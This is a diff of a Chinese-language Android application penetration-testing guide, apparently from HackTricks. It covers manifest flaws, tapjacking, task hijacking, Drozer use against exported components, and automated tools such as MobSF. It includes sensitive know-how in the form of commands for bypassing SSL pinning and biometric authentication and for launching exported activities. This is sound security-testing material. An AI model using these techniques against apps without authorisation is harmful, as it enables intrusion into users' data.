[https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd) - 从设备提取 APK: ```bash adb shell pm list packages @@ -67,7 +52,7 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed ### 寻找有趣的信息 -仅通过查看 APK 的**字符串**,您可以搜索**密码**、**URL**([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep))、**api** 密钥、**加密**、**蓝牙 UUID**、**令牌**以及任何有趣的内容……甚至查找代码执行的**后门**或身份验证后门(硬编码的管理员凭据)。 +仅通过查看 APK 的**字符串**,您可以搜索**密码**、**URL** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep))、**api** 密钥、**加密**、**蓝牙 UUID**、**令牌**以及任何有趣的内容……甚至查找代码执行的**后门**或身份验证后门(硬编码的管理员凭据)。 **Firebase** @@ -79,11 +64,11 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed 从 **Manifest.xml** 中识别的**漏洞**包括: -- **可调试应用程序**:在 _Manifest.xml_ 文件中设置为可调试(`debuggable="true"`)的应用程序存在风险,因为它们允许连接,可能导致被利用。有关如何利用可调试应用程序的进一步理解,请参考有关在设备上查找和利用可调试应用程序的教程。 +- **可调试应用程序**:在 _Manifest.xml_ 文件中设置为可调试 (`debuggable="true"`) 的应用程序存在风险,因为它们允许连接,可能导致被利用。有关如何利用可调试应用程序的进一步理解,请参考有关在设备上查找和利用可调试应用程序的教程。 - **备份设置**:对于处理敏感信息的应用程序,`android:allowBackup="false"` 属性应明确设置,以防止通过 adb 进行未经授权的数据备份,尤其是在启用 USB 调试时。 -- **网络安全**:_res/xml/_ 中的自定义网络安全配置(`android:networkSecurityConfig="@xml/network_security_config"`)可以指定安全细节,如证书固定和 HTTP 流量设置。一个例子是允许特定域的 HTTP 流量。 +- **网络安全**:_res/xml/_ 中的自定义网络安全配置 (`android:networkSecurityConfig="@xml/network_security_config"`) 可以指定安全细节,如证书固定和 HTTP 流量设置。一个例子是允许特定域的 HTTP 流量。 - **导出活动和服务**:在清单中识别导出的活动和服务可以突出可能被滥用的组件。在动态测试期间的进一步分析可以揭示如何利用这些组件。 -- **内容提供者和文件提供者**:暴露的内容提供者可能允许未经授权访问或修改数据。FileProviders 的配置也应受到审查。 +- **内容提供者和文件提供者**:暴露的内容提供者可能允许未经授权访问或修改数据。文件提供者的配置也应受到审查。 - **广播接收器和 URL 方案**:这些组件可能被利用进行攻击,特别注意如何管理 URL 方案以防止输入漏洞。 - **SDK 版本**:`minSdkVersion`、`targetSDKVersion` 和 `maxSdkVersion` 属性指示支持的 Android 版本,强调出于安全原因不支持过时、易受攻击的 Android 版本的重要性。 @@ -92,7 +77,7 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed ### Tapjacking **Tapjacking** 是一种攻击,其中**恶意** **应用程序**被启动并**定位在受害者应用程序的顶部**。一旦它可见地遮挡了受害者应用程序,其用户界面被设计成欺骗用户与之交互,同时将交互传递给受害者应用程序。\ -实际上,它是**让用户无法知道他们实际上是在对受害者应用程序执行操作**。 +实际上,它是**让用户不知道他们实际上是在对受害者应用程序执行操作**。 在这里找到更多信息: @@ -102,7 +87,7 @@ tapjacking.md ### 任务劫持 -一个**活动**的**`launchMode`** 设置为**`singleTask`**且没有定义任何 `taskAffinity` 是易受任务劫持的。这意味着,可以安装一个**应用程序**,如果在真实应用程序之前启动,它可能会**劫持真实应用程序的任务**(因此用户将与**恶意应用程序**交互,以为自己在使用真实应用程序)。 +一个**活动**如果**`launchMode`** 设置为 **`singleTask`** 且没有定义任何 `taskAffinity`,则容易受到任务劫持。这意味着,可以安装一个**应用程序**,如果在真实应用程序之前启动,它可能会**劫持真实应用程序的任务**(因此用户将与**恶意应用程序**交互,以为自己在使用真实应用程序)。 更多信息在: @@ -114,12 +99,12 @@ android-task-hijacking.md **内部存储** -在 Android 中,**存储**在**内部**存储中的文件**设计**为仅由**创建**它们的**应用程序**访问。此安全措施由 Android 操作系统**强制**,通常足以满足大多数应用程序的安全需求。然而,开发人员有时会利用 `MODE_WORLD_READABLE` 和 `MODE_WORLD_WRITABLE` 等模式来**允许**文件在不同应用程序之间**共享**。然而,这些模式**并不限制**其他应用程序(包括潜在的恶意应用程序)对这些文件的访问。 +在 Android 中,**存储**在**内部**存储中的文件**设计**为仅由**创建**它们的**应用程序**访问。此安全措施由 Android 操作系统强制执行,通常足以满足大多数应用程序的安全需求。然而,开发人员有时会使用 `MODE_WORLD_READABLE` 和 `MODE_WORLD_WRITABLE` 等模式,以**允许**文件在不同应用程序之间**共享**。然而,这些模式**并不限制**其他应用程序(包括潜在恶意应用程序)对这些文件的访问。 1. **静态分析:** - **确保**仔细审查 `MODE_WORLD_READABLE` 和 `MODE_WORLD_WRITABLE` 的使用。这些模式**可能会暴露**文件给**意外或未经授权的访问**。 2. **动态分析:** -- **验证**应用程序创建的文件上设置的**权限**。具体来说,**检查**是否有任何文件被**设置为全球可读或可写**。这可能构成重大安全风险,因为这将允许**任何安装在设备上的应用程序**,无论其来源或意图如何,**读取或修改**这些文件。 +- **验证**应用程序创建的文件上的**权限**。具体来说,**检查**是否有任何文件被**设置为全球可读或可写**。这可能构成重大安全风险,因为这将允许**任何安装在设备上的应用程序**,无论其来源或意图如何,**读取或修改**这些文件。 **外部存储** @@ -164,7 +149,7 @@ sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER); **使用不安全和/或过时的算法** -开发人员不应使用 **过时的算法** 来执行授权 **检查**、**存储** 或 **发送** 数据。这些算法包括:RC4、MD4、MD5、SHA1……如果 **哈希** 用于存储密码,例如,应该使用抗暴力破解的哈希并加盐。 +开发人员不应使用 **过时的算法** 来执行授权 **检查**、**存储** 或 **发送** 数据。这些算法包括:RC4、MD4、MD5、SHA1……如果 **哈希** 用于存储密码,例如,应该使用带盐的抗暴力破解 **哈希**。 ### 其他检查 @@ -192,17 +177,17 @@ react-native-application.md ### 超级打包应用程序 -根据这篇 [**博客文章**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) 超级打包是一种将应用程序内容压缩为单个文件的 Meta 算法。该博客讨论了创建一个解压这些应用程序的应用的可能性……以及一种更快的方法,即 **执行应用程序并从文件系统中收集解压的文件。** +根据这篇 [**博客文章**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) 超级打包是一种将应用程序内容压缩为单个文件的 Meta 算法。该博客讨论了创建一个可以解压这些应用程序的应用的可能性……以及一种更快的方法,即 **执行应用程序并从文件系统收集解压缩的文件。** ### 自动化静态代码分析 -工具 [**mariana-trench**](https://github.com/facebook/mariana-trench) 能够通过 **扫描** 应用程序的 **代码** 来发现 **漏洞**。该工具包含一系列 **已知源**(指示工具 **用户控制的输入位置**)、**汇**(指示工具 **危险位置**,恶意用户输入可能造成损害)和 **规则**。这些规则指示 **源-汇** 的 **组合**,表明存在漏洞。 +工具 [**mariana-trench**](https://github.com/facebook/mariana-trench) 能够通过 **扫描** 应用程序的 **代码** 来发现 **漏洞**。该工具包含一系列 **已知源**(指示工具 **用户控制的输入** 的 **位置**)、**汇**(指示工具 **危险** **位置**,恶意用户输入可能造成损害)和 **规则**。这些规则指示 **源-汇** 的 **组合**,表明存在漏洞。 通过这些知识,**mariana-trench 将审查代码并找到可能的漏洞**。 ### 泄露的秘密 -应用程序可能包含秘密(API 密钥、密码、隐藏的 URL、子域名……)您可能能够发现。您可以使用工具,例如 [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks) +应用程序可能包含秘密(API 密钥、密码、隐藏的 URL、子域名……)在其中,您可能能够发现。您可以使用工具,例如 [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks) ### 绕过生物识别认证 @@ -225,21 +210,6 @@ content-protocol.md --- -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客见解**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -及时了解最新的漏洞赏金发布和重要平台更新 - -**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作! - --- ## 动态分析 @@ -261,23 +231,23 @@ content-protocol.md #### 使用模拟器 - [**Android Studio**](https://developer.android.com/studio)(您可以创建 **x86** 和 **arm** 设备,并且根据 [**此**](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**最新的 x86** 版本 **支持 ARM 库**,无需使用慢速的 arm 模拟器)。 -- 学习如何在此页面上设置: +- 在此页面学习如何设置: {{#ref}} avd-android-virtual-device.md {{#endref}} -- [**Genymotion**](https://www.genymotion.com/fun-zone/) **(免费版:**个人版,您需要创建一个账户。_建议 **下载** 带有 _**VirtualBox** 的版本,以避免潜在错误。_) +- [**Genymotion**](https://www.genymotion.com/fun-zone/) **(免费版本:**个人版,您需要创建一个账户。_建议 **下载** 带有 _**VirtualBox** 的版本,以避免潜在错误。_) - [**Nox**](https://es.bignox.com)(免费,但不支持 Frida 或 Drozer)。 > [!NOTE] -> 在任何平台上创建新模拟器时,请记住,屏幕越大,模拟器运行越慢。因此,如果可能,请选择小屏幕。 +> 创建新模拟器时,请记住,屏幕越大,模拟器运行越慢。因此,如果可能,请选择小屏幕。 要在 Genymotion 中 **安装 Google 服务**(如 AppStore),您需要单击以下图像中红色标记的按钮: ![](<../../images/image (277).png>) -此外,请注意在 **Genymotion 中的 Android VM 配置** 中,您可以选择 **桥接网络模式**(如果您将从不同的 VM 连接到 Android VM 使用工具,这将非常有用)。 +此外,请注意在 **Genymotion 中的 Android VM 配置** 中,您可以选择 **桥接网络模式**(这在您将从不同的 VM 连接到 Android VM 时会很有用)。 #### 使用物理设备 @@ -289,8 +259,8 @@ avd-android-virtual-device.md 4. 按 **构建号** 7 次。 5. 返回,您将找到 **开发者选项**。 -> 一旦您安装了应用程序,您首先应该尝试它并调查它的功能、工作原理,并与之熟悉。\ -> 我建议使用 MobSF 动态分析 + pidcat 进行此初步动态分析,这样我们就可以 **了解应用程序的工作原理**,同时 MobSF **捕获** 许多您可以稍后查看的 **有趣数据**。 +> 一旦您安装了应用程序,您首先应该尝试它并调查它的功能、工作原理,并熟悉它。\ +> 我建议使用 MobSF 动态分析 + pidcat 进行此初步动态分析,这样我们就可以在 MobSF **捕获** 大量 **有趣的** **数据** 供您稍后查看的同时 **了解应用程序的工作原理**。 ### 意外数据泄露 @@ -299,12 +269,12 @@ avd-android-virtual-device.md 开发人员应谨慎公开 **调试信息**,因为这可能导致敏感数据泄露。建议使用工具 [**pidcat**](https://github.com/JakeWharton/pidcat) 和 `adb logcat` 监控应用程序日志,以识别和保护敏感信息。**Pidcat** 因其易用性和可读性而受到青睐。 > [!WARNING] -> 请注意,从 **Android 4.0 以后的版本**,**应用程序只能访问自己的日志**。因此,应用程序无法访问其他应用的日志。\ +> 请注意,从 **Android 4.0 及更高版本** 开始,**应用程序只能访问自己的日志**。因此,应用程序无法访问其他应用的日志。\ > 无论如何,仍然建议 **不要记录敏感信息**。 **复制/粘贴缓冲区缓存** -Android 的 **基于剪贴板** 的框架使应用程序能够实现复制粘贴功能,但由于 **其他应用程序** 可以 **访问** 剪贴板,可能会暴露敏感数据。因此,至关重要的是 **禁用敏感部分的复制/粘贴** 功能,例如信用卡详细信息,以防止数据泄露。 +Android 的 **基于剪贴板** 的框架使应用程序能够实现复制粘贴功能,但由于 **其他应用程序** 可以 **访问** 剪贴板,可能会暴露敏感数据,因此存在风险。对于应用程序的敏感部分(如信用卡详细信息),至关重要的是 **禁用复制/粘贴** 功能,以防止数据泄露。 **崩溃日志** @@ -314,12 +284,12 @@ Android 的 **基于剪贴板** 的框架使应用程序能够实现复制粘贴 **发送给第三方的分析数据** -应用程序通常集成像 Google Adsense 这样的服务,由于开发人员的不当实现,可能会 **泄露敏感数据**。为了识别潜在的数据泄露,建议 **拦截应用程序的流量**,检查是否有任何敏感信息被发送到第三方服务。 +应用程序通常集成 Google Adsense 等服务,由于开发人员的不当实施,可能会 **泄露敏感数据**。为了识别潜在的数据泄露,建议 **拦截应用程序的流量** 并检查是否有任何敏感信息被发送到第三方服务。 ### SQLite 数据库 大多数应用程序将使用 **内部 SQLite 数据库** 来保存信息。在渗透测试期间,请 **查看** 创建的 **数据库**、**表** 和 **列** 的名称以及所有保存的 **数据**,因为您可能会发现 **敏感信息**(这将是一个漏洞)。\ -数据库应位于 `/data/data/the.package.name/databases`,例如 `/data/data/com.mwr.example.sieve/databases` +数据库应位于 `/data/data/the.package.name/databases`,如 `/data/data/com.mwr.example.sieve/databases` 如果数据库保存机密信息并且是 **加密的**,但您可以在应用程序中 **找到** **密码**,这仍然是一个 **漏洞**。 @@ -327,7 +297,7 @@ Android 的 **基于剪贴板** 的框架使应用程序能够实现复制粘贴 ### Drozer(利用活动、内容提供者和服务) -来自 [Drozer 文档](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf):**Drozer** 允许您 **假设 Android 应用程序的角色** 并与其他应用程序交互。它可以做 **任何已安装应用程序可以做的事情**,例如利用 Android 的进程间通信(IPC)机制并与底层操作系统交互。\ +来自 [Drozer 文档](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf):**Drozer** 允许您 **假设 Android 应用程序的角色** 并与其他应用程序交互。它可以执行 **已安装应用程序可以做的任何事情**,例如利用 Android 的进程间通信(IPC)机制并与底层操作系统交互。\ Drozer 是一个有用的工具,可以 **利用导出活动、导出服务和内容提供者**,正如您将在以下部分中学习的那样。 ### 利用导出活动 @@ -337,7 +307,7 @@ Drozer 是一个有用的工具,可以 **利用导出活动、导出服务和 **授权绕过** -当一个活动被导出时,您可以从外部应用程序调用其界面。因此,如果一个包含 **敏感信息** 的活动被 **导出**,您可能会 **绕过** **认证** 机制 **以访问它**。 +当活动被导出时,您可以从外部应用程序调用其界面。因此,如果导出一个包含 **敏感信息** 的活动,您可能会 **绕过** **身份验证** 机制 **以访问它**。 [**了解如何使用 Drozer 利用导出活动。**](drozer-tutorial/#activities) @@ -348,46 +318,46 @@ Drozer 是一个有用的工具,可以 **利用导出活动、导出服务和 ```bash adb shell am start -n com.example.demo/com.example.test.MainActivity ``` -**注意**: MobSF 将会检测到使用 _**singleTask/singleInstance**_ 作为 `android:launchMode` 在一个活动中是恶意的,但由于 [this](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750),显然这在旧版本(API 版本 < 21)中才是危险的。 +**注意**:MobSF会将使用_**singleTask/singleInstance**_作为`android:launchMode`的活动检测为恶意,但由于[this](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750),显然这在旧版本(API版本<21)中才是危险的。 > [!NOTE] > 请注意,授权绕过并不总是一个漏洞,这取决于绕过的工作方式和暴露的信息。 **敏感信息泄露** -**活动也可以返回结果**。如果你设法找到一个导出且未保护的活动调用 **`setResult`** 方法并 **返回敏感信息**,则存在敏感信息泄露。 +**活动也可以返回结果**。如果您设法找到一个导出且未保护的活动调用**`setResult`**方法并**返回敏感信息**,则存在敏感信息泄露。 #### Tapjacking -如果没有防止 tapjacking,你可能会滥用导出的活动使 **用户执行意外操作**。有关 [**tapjacking 的更多信息,请查看链接**](./#tapjacking)。 +如果未防止tapjacking,您可能会滥用导出的活动使**用户执行意外操作**。有关[**tapjacking是什么的更多信息,请查看链接**](./#tapjacking)。 ### 利用内容提供者 - 访问和操纵敏感信息 -[**如果你想刷新内容提供者是什么,请阅读这个。**](android-applications-basics.md#content-provider)\ -内容提供者基本上用于 **共享数据**。如果一个应用有可用的内容提供者,你可能能够 **提取敏感** 数据。测试可能的 **SQL 注入** 和 **路径遍历** 也很有趣,因为它们可能存在漏洞。 +[**如果您想刷新内容提供者是什么,请阅读此内容。**](android-applications-basics.md#content-provider)\ +内容提供者基本上用于**共享数据**。如果一个应用程序有可用的内容提供者,您可能能够**提取敏感**数据。测试可能的**SQL注入**和**路径遍历**也很有趣,因为它们可能存在漏洞。 -[**学习如何使用 Drozer 利用内容提供者。**](drozer-tutorial/#content-providers) +[**了解如何使用Drozer利用内容提供者。**](drozer-tutorial/#content-providers) ### **利用服务** -[**如果你想刷新服务是什么,请阅读这个。**](android-applications-basics.md#services)\ -请记住,服务的操作始于方法 `onStartCommand`。 +[**如果您想刷新服务是什么,请阅读此内容。**](android-applications-basics.md#services)\ +请记住,服务的操作始于方法`onStartCommand`。 -服务基本上是可以 **接收数据**、**处理** 数据并 **返回**(或不返回)响应的东西。因此,如果一个应用导出了一些服务,你应该 **检查** 其 **代码** 以了解它在做什么,并 **动态测试** 以提取机密信息、绕过身份验证措施...\ -[**学习如何使用 Drozer 利用服务。**](drozer-tutorial/#services) +服务基本上是可以**接收数据**、**处理**数据并**返回**(或不返回)响应的东西。因此,如果一个应用程序导出了一些服务,您应该**检查**代码以了解它在做什么,并**动态**测试以提取机密信息、绕过身份验证措施...\ +[**了解如何使用Drozer利用服务。**](drozer-tutorial/#services) ### **利用广播接收器** -[**如果你想刷新广播接收器是什么,请阅读这个。**](android-applications-basics.md#broadcast-receivers)\ -请记住,广播接收器的操作始于方法 `onReceive`。 +[**如果您想刷新广播接收器是什么,请阅读此内容。**](android-applications-basics.md#broadcast-receivers)\ +请记住,广播接收器的操作始于方法`onReceive`。 广播接收器将等待某种类型的消息。根据接收器如何处理消息,它可能会存在漏洞。\ -[**学习如何使用 Drozer 利用广播接收器。**](./#exploiting-broadcast-receivers) +[**了解如何使用Drozer利用广播接收器。**](./#exploiting-broadcast-receivers) -### **利用方案 / 深度链接** +### **利用方案/深度链接** -你可以手动查找深度链接,使用像 MobSF 这样的工具或像 [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py) 的脚本。\ -你可以使用 **adb** 或 **浏览器** **打开** 一个声明的 **方案**: +您可以手动查找深度链接,使用像MobSF这样的工具或像[this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py)这样的脚本。\ +您可以使用**adb**或**浏览器**打开声明的**方案**: ```bash adb shell am start -a android.intent.action.VIEW -d "scheme://hostname/path?param=value" [your.package.name] ``` @@ -439,17 +409,17 @@ SSL 钉扎是一种安全措施,应用程序将服务器的证书与存储在 #### 绕过 SSL 钉扎 -当实施 SSL 钉扎时,绕过它变得必要以检查 HTTPS 流量。为此有多种方法可用: +当实施 SSL 钉扎时,绕过它成为检查 HTTPS 流量的必要条件。为此有多种方法可用: -- 自动**修改** **apk**以**绕过** SSLPinning,使用[**apk-mitm**](https://github.com/shroudedcode/apk-mitm)。此选项的最大优点是您无需 root 即可绕过 SSL 钉扎,但您需要删除应用程序并重新安装新版本,这并不总是有效。 +- 自动**修改** **apk**以**绕过** SSLPinning,使用[**apk-mitm**](https://github.com/shroudedcode/apk-mitm)。此选项的最大优点是,您无需 root 即可绕过 SSL 钉扎,但您需要删除应用程序并重新安装新版本,这并不总是有效。 - 您可以使用**Frida**(下面讨论)来绕过此保护。这里有一个使用 Burp+Frida+Genymotion 的指南:[https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/) - 您还可以尝试使用[**objection**](frida-tutorial/objection-tutorial.md)**自动绕过 SSL 钉扎**:`objection --gadget com.package.app explore --startup-command "android sslpinning disable"` - 您还可以尝试使用**MobSF 动态分析**(下面解释)**自动绕过 SSL 钉扎** - 如果您仍然认为有一些流量未被捕获,您可以尝试**使用 iptables 将流量转发到 burp**。阅读此博客:[https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62) -#### 寻找常见的网络漏洞 +#### 寻找常见的 Web 漏洞 -在应用程序中搜索常见的网络漏洞也很重要。有关识别和缓解这些漏洞的详细信息超出了本摘要的范围,但在其他地方有广泛的覆盖。 +在应用程序中搜索常见的 Web 漏洞也很重要。有关识别和缓解这些漏洞的详细信息超出了本摘要的范围,但在其他地方有广泛的覆盖。 ### Frida @@ -502,7 +472,7 @@ frida --codeshare krapgras/android-biometric-bypass-update-android-11 -U -f
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客见解**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -了解最新的漏洞赏金启动和重要平台更新 - -**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作! - ## 自动分析 ### [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF) @@ -560,15 +515,15 @@ getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE); ![](<../../images/image (866).png>) -**使用漂亮的基于 Web 的前端进行应用程序的漏洞评估。** 您还可以执行动态分析(但您需要准备环境)。 +**使用漂亮的基于 Web 的前端进行应用程序的漏洞评估。** 您还可以执行动态分析(但需要准备环境)。 ```bash docker pull opensecurity/mobile-security-framework-mobsf docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest ``` -注意,MobSF 可以分析 **Android**(apk)**、IOS**(ipa) **和 Windows**(apx) 应用程序(_Windows 应用程序必须从安装了 MobSF 的 Windows 主机进行分析_)。\ +注意,MobSF 可以分析 **Android**(apk)**、IOS**(ipa) **和 Windows**(apx) 应用程序(_Windows 应用程序必须从安装在 Windows 主机上的 MobSF 进行分析_)。\ 此外,如果您创建一个包含 **Android** 或 **IOS** 应用程序源代码的 **ZIP** 文件(转到应用程序的根文件夹,选择所有内容并创建一个 ZIP 文件),它也能够分析它。 -MobSF 还允许您进行 **diff/比较** 分析,并集成 **VirusTotal**(您需要在 _MobSF/settings.py_ 中设置您的 API 密钥并启用它:`VT_ENABLED = TRUE` `VT_API_KEY = ` `VT_UPLOAD = TRUE`)。您还可以将 `VT_UPLOAD` 设置为 `False`,这样 **hash** 将被 **上传** 而不是文件。 +MobSF 还允许您进行 **diff/比较** 分析,并集成 **VirusTotal**(您需要在 _MobSF/settings.py_ 中设置您的 API 密钥并启用它:`VT_ENABLED = TRUE` `VT_API_KEY = ` `VT_UPLOAD = TRUE`)。您还可以将 `VT_UPLOAD` 设置为 `False`,那么 **hash** 将被 **上传** 而不是文件。 ### 使用 MobSF 进行辅助动态分析 @@ -586,14 +541,14 @@ MobSF 还允许您进行 **diff/比较** 分析,并集成 **VirusTotal**(您 默认情况下,它还将使用一些 Frida 脚本来 **绕过 SSL 钉扎**、**根检测** 和 **调试器检测**,并 **监控有趣的 API**。\ MobSF 还可以 **调用导出活动**,抓取它们的 **屏幕截图** 并 **保存** 到报告中。 -要 **开始** 动态测试,请按绿色按钮:“**开始仪器化**”。按“**Frida 实时日志**”查看 Frida 脚本生成的日志,按“**实时 API 监视器**”查看所有调用的挂钩方法、传递的参数和返回值(在按下“开始仪器化”后会出现)。\ +要 **开始** 动态测试,请按绿色按钮:“**开始仪器化**”。按“**Frida 实时日志**”查看 Frida 脚本生成的日志,按“**实时 API 监视器**”查看所有调用的挂钩方法、传递的参数和返回值(这将在按下“开始仪器化”后出现)。\ MobSF 还允许您加载自己的 **Frida 脚本**(要将您的 Frida 脚本的结果发送到 MobSF,请使用函数 `send()`)。它还具有 **多个预编写的脚本**,您可以加载(您可以在 `MobSF/DynamicAnalyzer/tools/frida_scripts/others/` 中添加更多),只需 **选择它们**,按“**加载**”并按“**开始仪器化**”(您将能够在“**Frida 实时日志**”中看到该脚本的日志)。 ![](<../../images/image (419).png>) 此外,您还有一些辅助 Frida 功能: -- **枚举加载的类**:它将打印所有加载的类 +- **枚举已加载的类**:它将打印所有已加载的类 - **捕获字符串**:它将打印在使用应用程序时捕获的所有字符串(非常嘈杂) - **捕获字符串比较**:可能非常有用。它将 **显示正在比较的两个字符串** 以及结果是 True 还是 False。 - **枚举类方法**:输入类名(如 "java.io.File"),它将打印该类的所有方法。 @@ -604,7 +559,7 @@ MobSF 还允许您加载自己的 **Frida 脚本**(要将您的 Frida 脚本 **Shell** -Mobsf 还为您提供了一个带有一些 **adb** 命令、**MobSF 命令** 和常见 **shell** **命令** 的 shell,位于动态分析页面的底部。一些有趣的命令: +Mobsf 还为您提供一个带有一些 **adb** 命令、**MobSF 命令** 和常见 **shell** **命令** 的 shell,位于动态分析页面的底部。一些有趣的命令: ```bash help shell ls @@ -615,8 +570,8 @@ receivers ``` **HTTP工具** -当http流量被捕获时,您可以在“**HTTP(S) Traffic**”底部看到捕获流量的丑陋视图,或在“**Start HTTPTools**”绿色按钮中看到更好的视图。从第二个选项中,您可以**发送****捕获的请求**到**代理**如Burp或Owasp ZAP。\ -为此,_打开Burp -->_ _关闭拦截 --> 在MobSB HTTPTools中选择请求_ --> 按下“**Send to Fuzzer**” --> _选择代理地址_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080))。 +当http流量被捕获时,您可以在“**HTTP(S) Traffic**”底部看到捕获流量的丑陋视图,或在“**Start HTTPTools**”绿色按钮中看到更好的视图。从第二个选项中,您可以**发送**捕获的**请求**到像Burp或Owasp ZAP这样的**代理**。\ +为此,_打开Burp -->_ _关闭拦截 --> 在MobSB HTTPTools中选择请求_ --> 按“**Send to Fuzzer**” --> _选择代理地址_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080))。 完成MobSF的动态分析后,您可以按“**Start Web API Fuzzer**”来**模糊http请求**并寻找漏洞。 @@ -640,7 +595,7 @@ receivers ### [Qark](https://github.com/linkedin/qark) -该工具旨在查找多个**与安全相关的Android应用程序漏洞**,无论是在**源代码**还是**打包的APK**中。该工具还**能够创建可部署的“概念验证”APK**和**ADB命令**,以利用一些发现的漏洞(暴露的活动、意图、点击劫持...)。与Drozer一样,无需对测试设备进行root。 +该工具旨在查找多个**与安全相关的Android应用程序漏洞**,无论是在**源代码**还是**打包的APK**中。该工具还**能够创建可部署的“概念验证”APK**和**ADB命令**,以利用一些发现的漏洞(暴露的活动、意图、点击劫持...)。与Drozer一样,测试设备无需root。 ```bash pip3 install --user qark # --user is only needed if not using a virtualenv qark --apk path/to/my.apk @@ -660,11 +615,11 @@ reverse-apk relative/path/to/APP.apk ``` ### [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super) -SUPER 是一个可以在 Windows、MacOS X 和 Linux 上使用的命令行应用程序,分析 _.apk_ 文件以寻找漏洞。它通过解压 APK 并应用一系列规则来检测这些漏洞。 +SUPER 是一个可以在 Windows、MacOS X 和 Linux 上使用的命令行应用程序,旨在分析 _.apk_ 文件以寻找漏洞。它通过解压 APK 并应用一系列规则来检测这些漏洞。 -所有规则都集中在一个 `rules.json` 文件中,每个公司或测试人员可以创建自己的规则来分析他们需要的内容。 +所有规则都集中在一个 `rules.json` 文件中,每个公司或测试人员都可以创建自己的规则来分析他们需要的内容。 -从 [下载页面](https://superanalyzer.rocks/download.html) 下载最新的二进制文件。 +从 [download page](https://superanalyzer.rocks/download.html) 下载最新的二进制文件。 ``` super-analyzer {apk_file} ``` @@ -723,7 +678,7 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3 ### [ProGuard]() -来自 [Wikipedia](): **ProGuard** 是一个开源命令行工具,用于缩小、优化和混淆 Java 代码。它能够优化字节码,并检测和删除未使用的指令。ProGuard 是自由软件,按照 GNU 通用公共许可证第 2 版分发。 +来自 [Wikipedia](): **ProGuard** 是一个开源命令行工具,用于缩小、优化和混淆 Java 代码。它能够优化字节码,并检测和删除未使用的指令。ProGuard 是免费软件,按照 GNU 通用公共许可证第 2 版分发。 ProGuard 作为 Android SDK 的一部分分发,并在以发布模式构建应用程序时运行。 @@ -745,13 +700,17 @@ ProGuard 作为 Android SDK 的一部分分发,并在以发布模式构建应 您可以将混淆的 APK 上传到他们的平台。 +### [Deobfuscate android App](https://github.com/In3tinct/deobfuscate-android-app) + +这是一个 LLM 工具,用于查找 Android 应用程序中的潜在安全漏洞并去混淆 Android 应用程序代码。使用 Google 的 Gemini 公共 API。 + ### [Simplify](https://github.com/CalebFenton/simplify) -它是一个 **通用的 Android 去混淆工具。** Simplify **虚拟执行应用程序** 以理解其行为,然后 **尝试优化代码** 使其表现相同,但更易于人类理解。每种优化类型都简单且通用,因此无论使用何种特定类型的混淆都无关紧要。 +它是一个 **通用的 Android 去混淆器。** Simplify **虚拟执行应用程序** 以理解其行为,然后 **尝试优化代码** 使其行为相同,但更易于人类理解。每种优化类型都是简单和通用的,因此无论使用何种特定类型的混淆都无关紧要。 ### [APKiD](https://github.com/rednaga/APKiD) -APKiD 提供有关 **APK 制作方式** 的信息。它识别许多 **编译器**、**打包器**、**混淆器** 和其他奇怪的东西。它是 Android 的 [_PEiD_](https://www.aldeid.com/wiki/PEiD)。 +APKiD 为您提供有关 **APK 是如何制作的** 信息。它识别许多 **编译器**、**打包器**、**混淆器** 和其他奇怪的东西。它是 Android 的 [_PEiD_](https://www.aldeid.com/wiki/PEiD)。 ### 手动 @@ -763,7 +722,7 @@ APKiD 提供有关 **APK 制作方式** 的信息。它识别许多 **编译器* AndroL4b 是一个基于 ubuntu-mate 的 Android 